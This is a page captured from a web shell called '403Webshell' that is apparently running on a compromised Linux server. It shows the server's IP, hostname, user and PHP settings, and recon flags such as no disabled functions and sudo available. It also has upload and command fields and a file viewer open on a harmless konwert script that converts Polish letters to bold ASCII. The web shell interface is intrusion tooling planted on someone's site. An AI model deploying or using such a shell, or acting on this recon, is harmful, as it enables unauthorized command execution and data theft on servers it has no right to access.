403Webshell
Server IP : 185.252.147.100  /  Your IP : 216.73.217.33
Web Server : nginx/1.27.3
System : Linux mitrofanov.ru 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
User : mitr ( 1000)
PHP Version : 8.2.29
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/self/root/usr/share/konwert/filters/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/usr/share/konwert/filters/UTF8-boldpl
#!/bin/bash -

POPRAWKI=
for A in $ARG
do
	case "$A" in
	(*)
		if [ -x "${0%/*}/../aux/argcharset/$A" ]
		then
			POPRAWKI=${POPRAWKI:+$POPRAWKI |}${0%/*}/../aux/argcharset/$A
		fi
	esac
done

if [ "$POPRAWKI" ]
then
	"$SHELL" -c "$POPRAWKI"
else
	cat
fi |
trs -e '
	Ą	\e[1mA\e[22m
	Ć	\e[1mC\e[22m
	Ę	\e[1mE\e[22m
	Ł	\e[1mL\e[22m
	Ń	\e[1mN\e[22m
	Ó	\e[1mO\e[22m
	Ś	\e[1mS\e[22m
	Ź	\e[1mZ\e[22m
	Ż	\e[1mZ\e[22m
	ą	\e[1ma\e[22m
	ć	\e[1mc\e[22m
	ę	\e[1me\e[22m
	ł	\e[1ml\e[22m
	ń	\e[1mn\e[22m
	ó	\e[1mo\e[22m
	ś	\e[1ms\e[22m
	ź	\e[1mz\e[22m
	ż	\e[1mz\e[22m
' -f "${0%/*}/../aux/UTF8-ascii1"

Youez - 2016 - github.com/yon3zu
LinuXploit